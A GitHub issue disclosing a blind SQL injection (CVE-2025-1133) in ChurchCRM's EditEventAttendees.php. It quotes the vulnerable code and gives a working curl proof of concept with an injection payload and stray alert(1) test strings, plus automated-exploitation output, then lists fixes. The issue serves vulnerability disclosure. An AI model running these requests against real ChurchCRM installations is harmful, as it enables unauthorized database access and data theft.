Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bug: (CVE-2025-1133) - SQL Injection in EID Parameter via EditEventAttendees.php #7252

Open
PenTeZtZMicZ opened this issue Feb 8, 2025 · 0 comments
Open

Bug: (CVE-2025-1133) - SQL Injection in EID Parameter via EditEventAttendees.php #7252

PenTeZtZMicZ opened this issue Feb 8, 2025 · 0 comments
Labels
bug

Comments

@PenTeZtZMicZ
Copy link

Severity:

Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)

  • A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1133)

Authorization Required:

  • Administrator access required to view EditEventAttendees.php.

Description:

A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries by exploiting a boolean-based blind SQL Injection vulnerability in the EditEventAttendees functionality. The EID parameter is directly concatenated into an SQL query without proper sanitization, making it susceptible to SQL injection attacks. An attacker can manipulate the query, potentially leading to data exfiltration, modification, or deletion.

Exploiting the SQL Injection

Affected Asset:

  • http://<CHURCH_CRM>/EditEventAttendees.php

Vulnerable Source Code:

$EventID = $_POST['EID']; // from ListEvents button=Attendees

$sSQL = 'SELECT person_id, per_LastName FROM event_attend JOIN person_per ON person_per.per_id = event_attend.person_id WHERE event_id = ' . $EventID . ' ORDER by per_LastName, per_FirstName';
  • Vulnerability: The $EventID parameter is directly inserted into an SQL query without escaping or proper datatype specification, making it vulnerable to SQL Injection.

Steps to Reproduce:

  1. Navigate to the EditEventAttendees.php endpoint: http://<CHURCH_CRM>/EditEventAttendees.php
  2. Intercept the request using a tool like Burp Suite or manually craft a request.
  3. Modify the EID parameter with the following SQL Injection payload: 
    1 AND 5302=5302
  4. Observe the response or potential changes in the query execution indicating that SQL Injection is possible.

Proof of Concept (PoC):

Exploiting Boolean-Based Blind SQL Injection

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: <CHURCH_CRM>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 135' -H $'Origin: http://<CHURCH_CRM>' -H $'Connection: keep-alive' -H $'Referer: http://<CHURCH_CRM>/ListEvents.php' -H $'Upgrade-Insecure-Requests: 1' -H $'sec-ch-ua-platform: \"Windows\"' -H $'sec-ch-ua: \"Google Chrome\";v=\"117\", \"Chromium\";v=\"117\", \"Not=A?Brand\";v=\"24\"' -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0, i' \
    -b $'<CRM-COOKIE>' \
    --data-binary $'EID=3%20AND%205302=5302&EName=Summer%20Campalert(1)&EDesc=Summer%20Campalert(1)&EDate=June%2006%202017%2009:30%20am&Action=Attendees(1)' \
    $'http://<CHURCH_CRM>/EditEventAttendees.php'

Observed Response:

  • The request results in a successful response, confirming the SQL Injection vulnerability.

Automated Exploitation POC - Banner

---
Parameter: EID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EID=3 AND 5302=5302&Action=Attendees
---
[06:02:11] [INFO] the back-end DBMS is MySQL
[06:02:11] [INFO] fetching banner
[06:02:11] [INFO] retrieved: 22
[06:02:32] [INFO] retrieved: 11.6.2-MariaDB-ubu2404
web server operating system: Linux Debian
web application technology: Apache 2.4.62, PHP 8.4.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '11.6.2-MariaDB-ubu2404'

Impact:

  • Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and event information.
  • Database Manipulation: Attackers can modify, delete, or corrupt important data.
  • Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.

Recommended Fix:

  • Use prepared statements (parameterized queries) to prevent SQL Injection.
  • Implement input validation to reject dangerous characters.
  • Apply principle of least privilege to database users to limit damage from SQL Injection.
  • Sanitize and validate the $EventID variable before using it in the SQL query. Ensure it is an integer or properly escaped.

Environment:

  • Application: ChurchCRM 5.13.0
  • Tested on: Provided Docker in release
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@PenTeZtZMicZ